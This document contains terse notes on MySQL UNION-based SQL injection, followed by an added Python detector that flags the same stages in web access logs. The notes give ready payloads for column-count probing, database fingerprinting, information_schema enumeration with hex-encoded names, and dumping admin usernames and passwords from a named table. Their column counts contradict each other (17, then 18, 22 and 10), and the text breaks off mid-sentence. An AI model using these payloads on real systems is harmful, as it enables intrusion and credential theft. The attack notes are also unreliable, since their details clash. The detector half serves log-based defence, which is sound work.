MySql
Time: 2021-07-01 10:21:17
order by 17: normal
order by 18: abnormal, which means the column count is 17
id=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Use plus signs in place of spaces; the -- comments out the rest of the statement.
+and+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,17,18,19,20,21,22
version
user(): user
database(): database name, shsjk
After finding the database name, convert it to hexadecimal (with the 小葵 Xiaokui tool).
Dump the table names (MySQL 5.00 and later): wz_jj_admin
+and+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=0x7368736A6B [database name in hex]
Dump the column names: ad_username, ad_password
+and+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,group_concat(column_name),11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.columns where table_name=0x777A5F6A6A5F61646D696E [table name in hex]
Dump the data in ad_username, ad_password
union select 1,group_concat(ad_username,ad_password),3,4,5,6,7,8,9,10 from wz_jj_admin
this way there is no need to
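Each stage of the sequence above (column-count probing, UNION SELECT, fingerprint functions, information_schema enumeration, hex-encoded comparison values) leaves a recognizable query string in the web server access log. The following detection sketch is an added example, not part of the original notes; the rule names, the /item.php and /search.php paths and the log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One rule per stage of the walkthrough above; rule names are this example's own.
RULES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("fingerprint function", re.compile(r"\b(?:database|user|version)\s*\(\s*\)", re.I)),
    ("group_concat aggregation", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("schema enumeration",
     re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I)),
    ("hex-encoded comparison value", re.compile(r"=\s*0x[0-9a-f]{6,}", re.I)),
]
# Common/combined access-log prefix: client, ident, user, [time], "METHOD target
REQUEST = re.compile(r'(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+)')

def classify(query_string):
    """Return the names of the rules matching a raw (still URL-encoded) query string."""
    text = re.sub(r"\s+", " ", unquote_plus(query_string))  # '+' and %20 become spaces
    return [name for name, rx in RULES if rx.search(text)]

def scan(log_lines):
    """Map each client address to the sorted rule names its requests triggered."""
    hits = {}
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        found = classify(target.partition("?")[2])
        if found:
            hits.setdefault(client, set()).update(found)
    return {client: sorted(names) for client, names in hits.items()}

# Constructed sample log (documentation addresses, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jul/2021:10:20:01 +0800] "GET /item.php?id=2 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jul/2021:10:20:09 +0800] "GET /search.php?q=student+union+selection+order+by+mail HTTP/1.1" 200 911',
    '192.0.2.10 - - [01/Jul/2021:10:21:17 +0800] "GET /item.php?id=2+order+by+18 HTTP/1.1" 500 0',
    '192.0.2.10 - - [01/Jul/2021:10:21:30 +0800] "GET /item.php?id=2+and+1=2+UNION+SELECT+1,database(),3-- HTTP/1.1" 200 640',
    '192.0.2.10 - - [01/Jul/2021:10:21:52 +0800] "GET /item.php?id=2+and+1=2+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=0x7368736A6B HTTP/1.1" 200 702',
]

if __name__ == "__main__":
    for client, names in scan(SAMPLE_LOG).items():
        print(client, "->", ", ".join(names))
```

Matching request strings only flags the probing; the fix is in the application, where id must be bound as a query parameter instead of being concatenated into the SQL text.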